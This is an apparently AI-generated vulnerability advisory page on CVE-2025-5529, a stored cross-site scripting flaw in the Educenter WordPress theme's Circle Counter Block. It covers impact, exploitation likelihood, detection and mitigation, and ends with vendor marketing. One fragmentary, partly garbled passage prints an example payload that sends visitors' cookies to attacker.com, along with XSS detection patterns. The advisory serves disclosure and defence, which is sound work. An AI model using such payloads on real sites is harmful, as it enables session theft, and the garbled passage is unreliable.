
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-5529 is a Stored Cross-Site Scripting (XSS) vulnerability in the Educenter WordPress theme, developed by SparkleWP Themes. It affects all versions up to and including 1.6.2, where insufficient input sanitization and output escaping in the Circle Counter Block allows authenticated attackers with Contributor-level access or above to inject arbitrary web scripts into pages. The vulnerability was published on July 26, 2025, and assigned a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The vulnerability resides in the Circle Counter Block implementation within the Educenter theme, specifically at blocks-extends/blocks/circle-counter.php (line 46), where user-supplied input is neither properly sanitized before storage nor escaped before output (Wordfence, WordPress Trac). An attacker with at least Contributor-level WordPress access can embed a malicious script payload in a page or post using the Circle Counter Block; the script executes in the browser of any user who subsequently views the injected page.
Successful exploitation allows persistent JavaScript execution in the context of any site visitor's browser session, enabling session cookie theft, credential harvesting, defacement, or redirection to malicious sites. Because the injected script persists in stored page content, every user who views the affected page is at risk, including administrators whose elevated privileges could be leveraged for full site takeover. Confidentiality and integrity are both impacted (low severity per CVSS), while availability is not directly affected (Wordfence).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-5529 as of the available data. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of near-term exploitation. The vulnerability requires authenticated access at the Contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence).
circle-counter.php line 46), enter a crafted XSS payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent attribute-based payload.wp-admin/post.php or REST API endpoints containing script tags or encoded JavaScript payloads in Circle Counter Block parameters.wp_posts or wp_postmeta tables containing entries with <script>, javascript:, onerror=, or similar XSS patterns in Circle Counter Block content.blocks-extends/blocks/circle-counter.php, if an attacker escalated to file write access after initial XSS exploitation.Site administrators should update the Educenter theme to a version beyond 1.6.2 that includes a fix for this vulnerability, once a patched release is made available by SparkleWP Themes. In the interim, restrict Contributor-level user registrations and review existing Contributor accounts for unauthorized activity. Deploying a Web Application Firewall (WAF) such as Wordfence can help detect and block XSS payloads targeting this block (Wordfence, Sucuri).
Wordfence disclosed the vulnerability as part of its weekly WordPress vulnerability report for July 21–27, 2025, and Sucuri included it in their July 2025 WordPress vulnerability patch roundup (Wordfence Weekly, Sucuri). No notable independent researcher commentary or significant social media discussion has been identified beyond standard vulnerability aggregator coverage.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."